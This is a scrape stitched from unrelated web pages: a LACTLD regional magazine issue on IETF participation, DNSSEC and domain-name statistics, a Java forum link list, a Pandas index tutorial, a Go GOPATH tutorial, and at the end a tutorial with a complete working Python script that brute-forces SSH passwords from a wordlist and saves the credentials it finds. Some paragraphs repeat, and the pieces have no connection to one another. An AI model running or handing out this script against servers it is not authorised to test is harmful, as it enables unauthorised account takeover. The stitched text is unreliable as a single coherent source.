The most important IETF work for my job at a ccTLD is the series that defines the current version of DNSSEC (which actually was the second attempt to bring cryptography to the old DNS): RFCs 4033, 4034 and 4035. These are very well written and organized documents: the first provides an introduction, rationale and requirements; the second defines the new records; and the last describes the behavioral changes in the protocol. Beyond their importance in themselves, a tremendous effort was put into updating and tidying the DNS in general (e.g. the task of regulating the behavior of "empty non-terminals"), which becomes apparent as we revise the almost twenty older RFCs that they update or make obsolete. Sometimes you learn more from what is left out of an RFC than from what stays in.

IETF is not purely academic

By Hugo Salgado
Engineer at NIC Chile (.CL)

After this first experience, I began to follow more closely the work on the drafts being developed, and I had the chance to participate in the last meeting of the working group that resulted in IDNA 2008, the documents that define the use of internationalized domain names in the DNS (RFCs 5890-5895). Having the privilege of seeing people like Vint Cerf, Steve Crocker and John Klensin at work is something that reaffirmed my interest in the Internet, as far as both its technological and, mainly, its social capacities are concerned.

The IETF's work is sometimes seen as academic or purely scientific. But this is not true. The academy has its own mechanisms of progress in computing, based on the whole tradition of the scientific method and on its publication and discussion methods. The IETF is responsible for the "engineering", where scientific correctness is no longer the only variable: other aspects such as simplicity, ease of use, community acceptance, operational experience and even economic incentives are just as important. These are all variables that influence the success of a standard.

Bet on the social aspect

I've always had an interest in the more social aspects of the Internet. And, in that sense, the IETF continues to surprise me as an organization. A standardization entity that does not have members, where participation is open and no votes are cast, since decisions are taken
IETF is responsible for the “engineering”, where scientific correction is no longer the only variable, as other aspects such as simplicity, ease of use, community acceptance, operational experience and even economic incentive forces are as important. These are all variables that influence the success of a standard. Bet on the social aspect I’ve always had an interest in the more social aspects of the Internet. And, in that sense, IETF continues to surprise me as an organization. A standardization entity that does not have members, where participation is open and no votes are cast, since decisions are taken 14 • LACTLD Need for more Latin American participation based on consensus, sounds too good to really work! The slogan “We reject kings, presidents and voting. We believe in rough consensus and running code” is like the cyberpunk anthem and represents a certain challenge to the way in which these institutions are usually organized. Possibly for historical and cultural reasons, there is a very passive attitude towards the creation of knowledge in Latin America, particularly in science and engineering. There are barriers for participation both in the IETF and in other standardization entities. There is a minimum level of knowledge on certain topics and language. Another obstacle, more difficult to assess, is culture; that is, how to use the knowledge and language in a given scenario. From time to time, the IETF Internet Architecture Board publishes RFCs that address general issues, architectural decisions and protocol design practices that try to capture all lessons learned over the years. I especially recommend “What Makes for a Successful Protocol?” (5218), “Uncoordinated Protocol Development Considered Harmful” (5704), “Evolution of the IP Model” (6250) and “Design Considerations for Protocol Extensions” (6709). 
Now that people are again talking about issues of transparency and neutrality on the net and are seeking mechanisms to prevent abuses of online political power, it is valuable to reread documents outlining this philosophy, such as “Reflections on Internet Transparency” (4924) and “Privacy considerations for Internet protocols” (6973). 15 • LACTLD These barriers are real and, in this context, a list called IETFLAC was created with the support of ISOC, LACNIC and other organizations, which goal is to provide some IETF experiences and encourage participation. Some of us have offered to be the point of contact to all of those who want to submit their comments or topics of interest to the IETF. By Carlos Martínez Cagnazzo LACNIC Engineer of Investigation and Development. The regional approach is necessary as it helps to identify issues that affect lots of people but that are not being noticed by certain organizations or groups. We need to participate more. DOCUMENTS LACTLD report Domain names, evolutions and trends Latin America is close to nine million domain names and continues to grow at high rates in comparative terms with other regions. DANE and RPKI and their imminent impact Standards relating to DNS and IPv6 are the ones that have and will have the most impact on the Internet in the short term. In five years, what DANE (DNS -Based Authentication of Named Entities) and RPKI (Resource Public Key Infrastructure) work groups are doing will be relevant. DANE is this next twist of DNSSEC. We will have something extremely valuable being deployed on the Internet which is a directory service or a cryptographically signed database distributed worldwide. It is a most powerful tool with very interesting applications. DANE is also proposing incredibly attractive applications: basically how to express trust relationships in a more distributed and less centralized manner as we do today in the world of certificates. 
DANE DNSSEC and technology related to RPKI and origin validation are two sides of the same coin. Both try to offer cryptographic security to different pillars of the network: in one case, in terms of name resolution and, in the other, in terms of routing. While technologically different, they have a common goal. IETF work and the Internet of Things As widely known, online video and audio are some of the most important applications. In each video and audio application, there is a software component called codec, which is a little piece of software that is responsible for converting an analog signal into an online transmissible digital media. Codec historically have presented a big problem as they are closely related to patents. The most famous example is Mp3: for years if someone created a device or wrote a program that played Mp3 songs, he/ she would have to pay a license. There have been other cases of things that could not be done because there was no one to cover licensing costs. And this affects innovation. In this regard, IETF determined that the protocols it produces must be royalty free. They may be covered by a license but such must be for free. Globally, the total number of domain name registries is of approximately 265 million. The growth between April and August, 2013 represented a 2.4% increase (equivalent to a total of 6.2 million domain names). 45% refers to ccTLDs and 55% of the total market to gTLDs (Centr - DomainWire Edition 2 2013 ). In general terms, the proportion of domains that ccTLDs, at an overall global level, and gTLDs have is maintained. 16 • LACTLD In Latin America and the Caribbean Until August 2013, the total number of registered domain names of ccTLDs members of LACTLD was of 8,816,195, which represents a 6.33% decrease over the previous two months, when they reached 9.410.384 (May-June 2013). IETF standardized an audio codec and is trying to standardize a video one. 
I would dare to say that, since it is a common interest and legal security issue, most of the online content will be transferred to these codec. All this will have a social impact on the so called “Internet of Things”, which is based on an idea that is rather old but that, up until this day, could not be implemented because there were no hardware or protocols to do so. The purpose is to integrate the computing power in the objects that surround us. This requires a very large technology complex involving communication protocols, wireless protocols, network protocols, sensors, ways to transport that data and low power electronics. Every one of the necessary technology components is already emerging but it takes someone willing to invest to research and integrate everything. The list is also comprised of four ccTLDs from Asia and Pacific, 11 from Europe and two from North America. Among ccTLDs that recorded the highest growth rates in the four months from April to August, 2013, .br is fourth in terms of fastest growing (2.8 %), after .tk (13.9 %), . ru (4.8%) and .cn (3.5 %) (Centr, Domain Wire, 2 2013). It is important to note that the total number of active domain names in August 2013 has been significantly affected by a reduction in the .ar region. Such was due to a purge performed by the registry as a result of the implementation of a new policy and registry system. This led to the deletion of over 600,000 domains, in a zone that in June 2013 accounted for 2,977,581, which means a decrease of 22% in attempt to organize the records and to deter cyber-squatters. The impact of such action on the total LACTLD registries was considerable since .ar (together with .br, .ar, .co, .mx and .cl) is among the five records that lead the ranking in absolute numbers of domain names, representing over 93% of the region’s total. 
This also Source: Centr - DomainWire Edition 2 2013 The twenty more extensive ccTLDs, in terms of registered domain names, account for 81% of global ccTLD registrations, and include the three largest registries in Latin America and Caribbean: .br (Brazil), .ar (Argentina) and .co (Colombia). 17 • LACTLD Source: LACTLD domain name report LACTLD report Annual growth explains why this reduction had such a great effect on growth. Notwithstanding this change, net growth for the July-August period was of 0.95%, which represents, nonetheless, a reduction if compared with the previous two-month values. In Latin America and the Caribbean, ccTLD growth has been a constant feature for the period 2007-2013. In this region, the proportion of the penetration of domain names from country code Top Level Domains has been traditionally high and sustained when compared with generic Top Level Domains. Globally, the total number of domain name registries is of approximately 265 million. Source: Matthew Zook. As far as net growth is concerned, the global domain name market has steadily declined in recent years. However, the expansion of LACTLD region registries is still higher, on average, than that of the European ccTLDs and gTLDs (see Graphic 2). It should be noted that the denominator is different in these statistics (i.e., total gTLD registries exceed 110 million). After a brief growth spurt in early 2013, when the number of registries exceeded nine million members, combined bimonthly rates decreased in the last six months until August when they leveled. Despite this decline, in the last 12 months, LACTLD members have grown 2.5 % in total (10.5% if changes in .ar are excluded), compared with 5.9% for European ccTLDs and 3,7% for global gTLDs over the same period. The annual growth for the period from August 2012 to August 2013 was 2.5 % in absolute numbers. Over the past twelve months, average growth has been 14.2%. 
Again, it is worth noting that the significant alteration in August was mainly due to the changes in .ar. If such changes are not taken into account, the growth rate for that period would be over 10% in absolute numbers. (Sources: LACTLD domain name report; Matthew Zook.)

With respect to the behavior of the ccTLDs that grew the most in relative terms in the region, .ai experienced the largest increase for the period from July to August 2013: 6.1%. It is worth mentioning that this rate places it among the top five members of LACTLD for the last three year periods observed (mention which periods); it is followed by .do with 4.3%, .ec with 3.1%, .bo with 2.8% and .gt with 2.6%. As usual, the diversity of ccTLDs in Latin America and the Caribbean shows a varied and heterogeneous behavior in aspects relating to the growth of their domain names. Again, the relevance of registry policies becomes evident, such as in the case of .ar, as far as trends and growth rates are concerned. During the last year the average growth of ccTLDs in the region was 14%.

DOCUMENTS

The importance of DNSSEC
By Patrik Fältström, Manager Research and Development at Netnod

Domain Name System Security Extensions have a key role in solving security problems. Today many TLDs and organizations have deployed DNSSEC, but even more still ask the question whether it is worth the effort, whether DNSSEC actually helps with something. It does. It does not help against every security problem we have in the world and it does not solve all problems we have with DNS either. But it is one of many important pieces of the puzzle, and we need all of them to have the puzzle completed.

So what does DNSSEC help with?

It helps solving one, but only one, important piece, and that is to know that the data received comes from an authoritative source and that the data has not been changed during transport. These two things do of course depend on many involved parties doing the right thing (and we will look closer at that a bit later), but it also allows an even higher number of parties to potentially do the wrong thing. And we can accept data being passed around by parties we do not trust. Because DNSSEC changes the trust model we have: from "only" trusting whoever gives us data to something called a chain of trust. One anchors the trust somewhere in the DNS hierarchy, and by doing so one can derive the trust in all signed domain names below the so-called trust anchor. It is the party validating the signatures on the responses that decides where the trust anchor is, and finally whether the potentially validated response is to be trusted or not.

Operating DNSSEC

But let's start from the beginning. What do we need to make DNSSEC work? In fact, quite a large number of things. First of all, the root zone must be signed. It is, since a number of years back, and the public key for the root zone is published in a multitude of ways. With the help of that key, the root zone management (IANA, the Department of Commerce of the USA and Verisign) can sign all public keys that TLDs pass to IANA. The signatures for those keys (the so-called DS records) are then published in the root zone. So the second thing we need is for the TLD to be signed. Many of them are, but there are still a few that are not.

Just like the root zone manager signs the key of the TLD, a TLD registry is to sign the keys for its child zones. In a registry/registrar system that is done by having the DNS operator for the zone pass the public key via the registrar to the registry, so that a DS record can be published and signed in the zone of the TLD. Today this is easy in the cases where the registrar is also the DNS operator, but harder when the DNS operator is not a registrar. The reason why it is harder is that we do have the EPP protocol between registry and registrar, but we do not have a standardized way to communicate with the registrars. Registrars have web frontends, and some have APIs, but neither of the two are standardized. And we are far from the point in time that all registrars do handle DNSSEC.

The fourth piece is, as described above, that the manager of the zone that is to be signed signs it and passes the public key to the registrar. That can be done after the key(s) are generated, the private key is stored somewhere secure and the zone is signed. The signatures are pushed into the zone file itself and a new zone file is published. Of course this is an automated process, but not many provisioning tools can handle this correctly. Many DNS operators of today still use low-level tools like the dnssec zone signing tools that are distributed with the BIND package. Others use somewhat more sophisticated tools (like OpenDNSSEC), but what we finally do see is complete DNSSEC management in provisioning software from a number of different vendors.

But having a signed zone in the authoritative DNS servers, and a chain of signed DNS key material to the root of the DNS, is not enough. That only creates the chain needed to do the validation. We have to actually do the validation as well.

[Figure: The various relationships involved in DNSSEC]

It is the resolver operators that do the validation. This implies the validation can be made in the local computer by having a DNS resolver running locally. Unfortunately many Internet Access Providers (at hotels and internet hotspots for example) do filter DNS, which makes it impossible to receive the DNSSEC key material (such as the signatures), and because of that running validation locally is very difficult. It sometimes works, but also fails sometimes. The alternative is to send DNS queries as normal to the resolver that the access provider points at in the DHCP response one gets when requesting access to the local network. This implies one has to trust both the DHCP response and the one doing the resolution of DNS queries, and on top of that one has to hope the resolver is validating DNSSEC signed responses. Not all access providers do. In Sweden 97% of the DNS queries to local resolvers do result in validation, but that is because all larger access providers validate queries. Hotels and other WiFi access points (where validation might be needed the most) are still not doing it. In other parts of the world the numbers are not even close to being so good.

But let's say the responses are validated, and that whoever is doing the validation succeeds in calculating a chain of trust to one of the selected trust anchors; then we know much more about the response. More specifically, we know that many of the attack vectors that exist against the namespace we use are cut off. Many others still exist, but they have to be fought with other means.

There are still, as mentioned above, some issues with the communication with the registrars, but a new initiative in the IETF is looking at the whole EPP architecture. Mainly between registry and registrars, but if that is simplified there is hope the DNS operator – registrar communication ends up being simplified as well.

This is the reason why so many things must work before one can say that DNSSEC is deployed. But this is also why incremental steps towards a full DNSSEC deployment are so important. For example that TLDs sign their zones. Or that resolver operators validate responses. Each and every step towards this solution makes the world better.

Anniversary

.br celebrates 25 years

The latest statistics show that there are 3,267,353 .br domains registered.
The Information and Coordination Center for Dot Br (Nic.br) has been providing services to individuals and companies in Brazil for almost 25 years. It is about to celebrate the 25th anniversary of April 18, 1989, when .br was assigned, even before the advent of the Internet in Brazil. Nic.br is currently a nonprofit organization that, since May 1995, has been relying on criteria established by the Internet Steering Committee in Brazil (CGI.br), the agency responsible for the coordination and integration of Internet initiatives and services in the country. Its main purpose is to promote the Internet, and its main duties are to:

• register and maintain domain names using .br and distribute Autonomous System Numbers (ASN) and IPv4 and IPv6 addresses in the country through Registro.br;
• address and respond to security incidents that affect computer networks connected to the Internet in Brazil, activities which are in charge of CERT.br;
• intervene in projects that support or improve infrastructure networks in the country, such as the direct interconnection between networks (PPT.br) and the distribution of the Brazilian Network Time Protocol (NTP.br), initiatives that depend on CEPTRO.br;
• produce and disseminate indicators, statistics and information on the strategic development of the Internet in Brazil, under the responsibility of CETIC.br;
• promote studies and recommend technical and operational procedures, rules and standards for network and Internet service security, as well as for its increasing and appropriate use by society;
• provide technical and operational support to LACNIC, the Internet Address Registry for Latin America and the Caribbean; and
• be the home of the Brazilian W3C Office, which develops standards for the web.

Initially used in the Brazilian academic network, .br expanded rapidly and, in September 2006, the first million domains was registered. In February 2010, there were two million domains, and, in August 2012, three million. The latest statistics, which include registrations made until August 20, 2013, indicate that there are 3,267,353 registered domains; 94.5% of them correspond to generic domains, mainly .com.br. With the first TCP/IP connections in 1991, the structure was defined under .br. There is a closed second level with different subdomains that serve different segments of society. .br is a "thick" registry that holds a direct relationship with registrants while accepting that several providers assist with registrations. Domain names can be registered for one to ten years. Besides, it provides an optional DNS service, at no charge, that includes DNSSEC. As for the currently active working groups, namely Engineering and Network Operations and Network Security, their purpose is to support technical, administrative and operational recommendations and decisions by CGI.br.

twitter.com/lactld
facebook.com/LACTLD
Address: Rambla Rep. de México 6125, CP 11400, Montevideo, Uruguay
Tel.: + 598 2604 2222* (General Contact)
Email: contacto@lactld.org
https://issuu.com/lactld/docs/lactld_03_ingles_baja
Related discussions:

- inserting text into text file using java application: Hi, I want to insert a text or string into a text file using java application
- Reading a text file in java: What is the code for Reading a text file in java? Thaks. Reply: see the tutorial Read File in Java. There are many classes and interfaces...
- Java (Text To Speech): How can a selected part of a webpage be pronounced using java Swing
- text to speect - Java Beginners: please i need a j2me library that convert text to speech on me please any one can help me my email is ahmed_akl2010@yahoo.coim
- text editor in java: hi friends, i want to do a mini project in programmers editor with syntax based coloring in java. i have no idea about this project and i dont know the java lang also. from now only i have to learn. please
- voice to text in java: i'm doing my mini project and my objective is to create a pdf interface using netbeans and instead of text search option, i... to text conversion and so if i can convert speech to text then i can easily go
- java script text box: hi, I created a button when i click... will click submit button the text should be submitted (it shows the value in alert). i also want the text box should generate in front of NEW button (next/prev
- To convert Speech to Text in java: package abc; import javax.speech.*; import javax.speech.recognition.*; import java.io.FileReader; import java.util.Locale; public class HelloWorld extends ResultAdapter { static Recognizer ...
- writing a text into text file at particular line number: Hi, thanks for quick response, I want to insert text at some particular line number.. after line number four my text will display in text file using java program
- Text Editor with Syntax Highlighting: How to write a java program for text editor with syntax highlighting
- new String(text) - Java Beginners: Please, what is the difference between this.text = text; and this.text = new String(text); in the example: public ... In this Case Java will create a new String object in normal (non-pool...
- save text file - Java Beginners: hi i have just start programming in java. please guide me if i want to read a text file in java. then the text file is save in which directory
- Read text File: Hi, How can I get line and keep in a String in Java
- Text change and click events: Create user login form and apply textchange and click events in java
- voice to text converstion: how i can make a speech to text converstion program in java??? i have no idea about this project. so pls pls help me. thank you
- CALULATION IN TEXT FIELD: Suppose 3 text Field first amount, second amount and third sum of these amount, this amount will appear when tab in next filed (i don't want use any type button) in java swing HOW? PLEASE HELP
- Adding a text file - Java Beginners: Hello, I need a program that will search a text file of strings representing numbers of type int and will write the largest and the smallest numbers to the screen. The file contains nothing but strings
- Help in making a text formatter: I have a question on how to make a text formatter using Java. I attempted in doing so, but got a really low score... of the
- text field validation - Java Beginners: How to validate allow only decimal number in text box in jsp? Reply: Try the following code: function isDecimal(str){ if(isNaN(str) || str.indexOf(".")<0){ alert ...
- Scanning a word in a TEXT document: Hi Genius persons... I'm having many resumes in my FOLDER called HARISH in D: (colon) i want to scan... by searching the JAVA and .net words present in the files.. if JAVA word is present means
- Text To speech exception - Java Beginners: Sir/Madam, I want to create a application for text to speech. I am using Sysnthesizer class of speech package but it return null. Can you help me to create that. i am facing error in synth.allocate
- how to update the text file?: my textfile with name list.txt: Rice... 150 .... ....20 lines. java code: import java.io.*; import java.util.*; class... in my text file, if the item i entered matches with item in text file. how can i
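Several of the threads above ask how to insert text into a file at a particular line number (e.g. after line four). A small self-contained sketch of one common approach: read all lines, insert into the list, and write the file back. The file name and inserted text here are made up for illustration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class InsertAtLine {
    public static void main(String[] args) throws IOException {
        Path file = Paths.get("list.txt");
        // create a sample file with five lines
        Files.write(file, Arrays.asList("line 1", "line 2", "line 3", "line 4", "line 5"),
                StandardCharsets.UTF_8);

        // read all lines, then insert the new text after line 4 (list index 4, 0-based)
        List<String> lines = new ArrayList<>(Files.readAllLines(file, StandardCharsets.UTF_8));
        lines.add(4, "inserted text");
        Files.write(file, lines, StandardCharsets.UTF_8);

        System.out.println(Files.readAllLines(file, StandardCharsets.UTF_8));
        // [line 1, line 2, line 3, line 4, inserted text, line 5]
    }
}
```

This rewrites the whole file, which is fine for small files; for very large files a streaming copy to a temporary file would be more appropriate.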
http://www.roseindia.net/discussion/22142-Rotate-Text-in-Java.html
Introduction to Pandas Index

Pandas Index is an immutable array implementing an ordered, sliceable set. It is the basic object that stores the axis labels for all pandas objects. The attribute index.values returns an array of the values held by the index object.

Example:

import pandas as pd
idx = pd.Index(['value 1', 'value 2', 'value 3'])
print(idx)
output = idx.values
print(output)

Here, we first import pandas as pd, then create an index called "idx" with string values and print it. We then use idx.values to get the underlying array back from the index object and finally print the result.

- Pandas indexing also applies to the pandas DataFrame, where the data structure is two-dimensional, meaning the data is arranged in rows and columns.
- For the rows, the index to use is the user's choice, and the default is np.arange(n) if no index has been given.

How to Create and Work with an Index in Pandas?

There is a structured template to create an index in a Pandas DataFrame:

import pandas as pd
data = {
    'column one': ['value one', 'value two', 'value three', ...],
    'column two': ['value one', 'value two', 'value three', ...],
    'column three': ['value one', 'value two', 'value three', ...],
}
df = pd.DataFrame(data, columns=['column one', 'column two', 'column three', ...],
                  index=['A1', 'A2', 'A3', ...])

We should always remember that quotes are used only for string values and not for integers or other numeric values.

Example:

import pandas as pd
lux = {'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci'],
       'Price': [15000, 16000, 17000, 18000]}
df = pd.DataFrame(lux, columns=['Brand', 'Price'], index=['p_1', 'p_2', 'p_3', 'p_4'])
print(df)

Output:

From the above example, we have data about luxury brands called "lux". We want to print the names and prices of these brands using pandas indexing in a Python DataFrame.
Firstly, we import pandas as pd, and then we start adding values to the index: we create a variable called lux and add the brands and their prices, which we want represented in rows-and-columns format. Later, we define the DataFrame as df, access the data of the luxury brands and add the index values of the products, represented by p_1, p_2, p_3, p_4. The system numbers the default index values starting from 0, identifies the rows and the columns and finally prints out the output.

How to Use Multiple Indexes in Pandas?

Multiple (multi-line) indexes are nothing but the tabulation of rows and columns in multiple lines. Here the indexes can be added, removed, and replaced.

Example:

import pandas as pd
df = pd.DataFrame({'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'],
                   'Price': [15000, 16000, 17000, 18000, 19000]})
df = df.set_index(['Brand', 'Price'])
print(df)

Output:

In the above program, we add the same rows and columns in multiple lines and finally invoke the set_index function, which thus gives the output.

How to Set and Reset the Index in Pandas?

Set and reset the index in pandas as follows:

1. set_index(): Pandas set_index() is an inbuilt pandas function that is used to set a List, Series or DataFrame as the index of a DataFrame. It sets the index in the DataFrame using the available columns. This command can basically replace or expand the existing index columns.

Example:

import pandas as pd
df = pd.DataFrame({'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'],
                   'Price': [15000, 16000, 17000, 18000, 19000]})
df = df.set_index('Brand')
print(df)

Output:

Here, we import pandas and add the values to the DataFrame. Later, we call the set_index function, which makes the brand name the index, and assign the result back to the DataFrame. Hence, in the output, 'Brand' appears as a separate index column.

2.
reset_index(): We can reset the index using the syntax:

df.reset_index(drop=True)

Example:

import pandas as pd
lux = {'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'],
       'Price': [15000, 16000, 17000, 18000, 19000]}
df = pd.DataFrame(lux, columns=['Brand', 'Price'])
df = df.drop([0, 2])
df = df.reset_index(drop=True)
print(df)

Output:

The first stage is to collect the data of the various luxury brands and their prices.

- The next step is to create a DataFrame using the Python code. Hence we get an output where index numbers are assigned to all the values in sequential format from 0 to 4.
- The next stage is to call the drop function, because without it there would be nothing for the reset_index() command to fix. Once we call drop with the respective index labels, the indexes are no longer sequential: this command drops the 0th index value, which is "Armani", and also the 2nd index value, which is "Prada", and prints the rest of the rows with their original index numbers.
- Finally, we add the reset_index command, the indexes become sequential again, and the result is printed in the output.

Conclusion

Pandas in Python makes it extremely easy to work and play with data analysis concepts. Being able to look up and use functions quickly allows us to achieve a certain flow when writing code. The rows and columns attributes of a Pandas DataFrame are useful when we need to process only specific rows or columns. It is also valuable to get the label information and print it for future debugging purposes.

Recommended Articles

This is a guide to Pandas Index. Here we discuss the introduction and how to create and work with an index in pandas, along with different examples and their code implementation. You may also have a look at the following articles to learn more –
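As a quick, runnable recap of the set_index and reset_index behavior described above (the brand and price values are taken from the article's examples):

```python
import pandas as pd

lux = {'Brand': ['Armani', 'Valentino', 'Prada', 'Gucci', 'Dolce Gabbana'],
       'Price': [15000, 16000, 17000, 18000, 19000]}
df = pd.DataFrame(lux)

# set_index: 'Brand' becomes the index, so rows can be looked up by label
by_brand = df.set_index('Brand')
print(by_brand.loc['Prada', 'Price'])   # 17000

# drop rows 0 and 2, then reset_index to renumber the rows 0..n-1 again
trimmed = df.drop([0, 2]).reset_index(drop=True)
print(trimmed['Brand'].tolist())        # ['Valentino', 'Gucci', 'Dolce Gabbana']
print(trimmed.index.tolist())           # [0, 1, 2]
```

Note that with drop=True the old index is discarded; without it, reset_index would keep the old index as a new column.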
https://www.educba.com/pandas-index/?source=leftnav
Understanding the GOPATH

Introduction

This article will walk you through understanding what the GOPATH is, how it works, and how to set it up. This is a crucial step for setting up a Go development environment, as well as understanding how Go finds, installs, and builds source files. In this article we will use GOPATH when referring to the concept of the folder structure we will be discussing. We will use $GOPATH to refer to the environment variable that Go uses to find the folder structure.

Setting the $GOPATH Environment Variable

The $GOPATH environment variable lists places for Go to look for Go Workspaces. By default, Go assumes our GOPATH location is at $HOME/go, where $HOME is the root directory of our user account on our computer. We can change this by setting the $GOPATH environment variable. For further study, follow this tutorial on reading and setting environment variables in Linux. For more information on setting the $GOPATH variable, see the Go documentation. Furthermore, this series walks through installing Go and setting up a Go development environment.

$GOPATH Is Not $GOROOT

The $GOROOT is where Go's code, compiler, and tooling lives; this is not our source code. The $GOROOT is usually something like /usr/local/go. Our $GOPATH is usually something like $HOME/go. While we don't need to specifically set up the $GOROOT variable anymore, it is still referenced in older materials. Now, let's discuss the structure of the Go Workspace.

Anatomy of the Go Workspace

Inside a Go Workspace, or GOPATH, there are three directories: bin, pkg, and src. The $GOPATH/bin directory is where Go places binaries that go install compiles. Our operating system uses the $PATH environment variable to find binary applications that can execute without a full path. It is recommended to add this directory to our global $PATH variable.
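In a bash-like shell, setting the variable and extending $PATH typically looks like the following sketch (paths assume the default workspace location mentioned above):

```shell
# point $GOPATH at the default workspace and put its bin directory on $PATH
export GOPATH="$HOME/go"
export PATH="$PATH:$GOPATH/bin"
echo "$GOPATH"   # e.g. /home/sammy/go
```

To make this persistent, these lines would usually go in a shell startup file such as ~/.profile or ~/.bashrc.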
For example, if we don't add $GOPATH/bin to $PATH, then to execute a program from there we would need to run:

$GOPATH/bin/myapp

When $GOPATH/bin is added to $PATH, we can make the same call like so:

myapp

The $GOPATH/pkg directory is where Go stores pre-compiled object files to speed up subsequent compiling of programs. Typically, most developers won't need to access this directory. If you experience issues with compilation, you can safely delete this directory and Go will then rebuild it.

The src directory is where all of our .go files, or source code, must be located. This shouldn't be confused with the source code the Go tooling uses, which is located at $GOROOT. As we write Go applications, packages, and libraries, we will place these files under $GOPATH/src/path/to/code.

What Are Packages?

Go code is organized in packages. A package represents all the files in a single directory on disk. One directory can contain only files from the same package. Packages are stored, with all user-written Go source files, under the $GOPATH/src directory. We can understand package resolution by importing different packages. If our code lives at $GOPATH/src/blue/red then its package name should be red. The import statement for the red package would be:

import "blue/red"
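A minimal sketch of that on-disk layout from the shell. The blue/red package is the article's example; the file contents are made up for illustration, and a throwaway directory stands in for the workspace root so the sketch doesn't touch a real GOPATH:

```shell
# use a throwaway workspace root instead of the real $GOPATH
workspace="$(mktemp -d)"

# the package blue/red lives under <workspace>/src/blue/red
pkg_dir="$workspace/src/blue/red"
mkdir -p "$pkg_dir"

# every .go file in that directory must declare the same package: red
cat > "$pkg_dir/red.go" <<'EOF'
package red

// Name exists only so the package exports something.
func Name() string { return "red" }
EOF

echo "created $pkg_dir/red.go"
```

With the real $GOPATH in place of the temporary directory, `import "blue/red"` would resolve to exactly this folder.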
Finally, we discussed how Go searches for packages within that folder structure. Introduced in Go 1.11, Go Modules aim to replace Go Workspaces and the GOPATH. While it is recommended to start using modules, some environments, such as corporate environments, may not be ready to use modules. The GOPATH is one of the trickier aspects of setting up Go, but once it is set up, we can usually forget about it.
https://www.digitalocean.com/community/tutorials/understanding-the-gopath
A brute-force attack is an activity which involves repetitive attempts of trying many password combinations to break into a system that requires authentication. In this tutorial, you will learn how you can make a brute-force script in Python for SSH connections.

Read Also: How to Make a Subdomain Scanner in Python.

We'll be using the paramiko library, which provides us with an easy SSH client interface; let's install it:

pip3 install paramiko colorama

We're using colorama just for nice printing, nothing else. Open up a new Python file and import the required modules:

import paramiko
import socket
import time
from colorama import init, Fore

Defining some colors we're gonna use:

# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE

Now let's build a function that, given a hostname, username and password, tells us whether the combination is correct:

def is_ssh_open(hostname, username, password):
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to known hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        # sleep for a minute
        time.sleep(60)
        return is_ssh_open(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
        return True

A lot to cover here. First, we initialize our SSH client using the paramiko.SSHClient() class, which is a high-level representation of a session with an SSH server.
Second, we set the policy to use when connecting to servers without a known host key; we used paramiko.AutoAddPolicy(), which is a policy for automatically adding the hostname and new host key to the local host keys and saving them.

Finally, we try to connect to the SSH server and authenticate to it using the client.connect() method with a timeout of 3 seconds. This method raises:

- socket.timeout when the host is unreachable within the timeout;
- paramiko.AuthenticationException when the credentials are invalid;
- paramiko.SSHException for other connection failures, for instance when too many attempts are made in a short time (quota exceeded), in which case the function above sleeps for a minute and retries.

If none of the above exceptions were raised, the connection was successfully established and the credentials are correct, so we return True in this case.

Since this is a command-line script, we will parse arguments passed in the command line:

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
    parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
    parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
    parser.add_argument("-u", "--user", help="Host username.")
    # parse passed arguments
    args = parser.parse_args()
    host = args.host
    passlist = args.passlist
    user = args.user
    # read the file
    passlist = open(passlist).read().splitlines()
    # brute-force
    for password in passlist:
        if is_ssh_open(host, user, password):
            # if combo is valid, save it to a file
            open("credentials.txt", "w").write(f"{user}@{host}:{password}")
            break

We basically parsed arguments to retrieve the hostname, username and password list file, and then iterated over all the passwords in the wordlist. I ran this on my local SSH server; here is a screenshot:

wordlist.txt is an nmap password list file that contains more than 5000 passwords. I essentially grabbed it from the Kali Linux OS under the path "/usr/share/wordlists/nmap.lst".

DISCLAIMER: Test this with a server or a machine that you have permission to test on; otherwise it isn't our responsibility.

Alright, we are basically done with this tutorial; see how you can extend this script to use multi-threading for fast brute forcing.
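One way to add that multi-threading is a thread pool over the wordlist. The sketch below uses a stand-in check function instead of is_ssh_open (and an assumed correct password "s3cret") so it runs offline; in the real script you would submit is_ssh_open(host, user, password) to the pool instead:

```python
from concurrent.futures import ThreadPoolExecutor

def check_password(password):
    # stand-in for is_ssh_open(host, user, password), runnable without a server
    return password == "s3cret"

def brute_force(passwords, workers=8):
    # pool.map preserves input order, so the first match found is deterministic
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for password, ok in zip(passwords, pool.map(check_password, passwords)):
            if ok:
                return password
    return None

print(brute_force(["123456", "qwerty", "s3cret", "letmein"]))  # s3cret
```

Note that many SSH servers throttle or drop parallel authentication attempts, so in practice a small worker count (or a per-host connection limit) tends to work better than a large one.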
If you wish to brute-force FTP servers instead, check this tutorial.

RELATED: How to Make a Port Scanner in Python using Socket Library.

Happy brute-forcing ♥
https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python
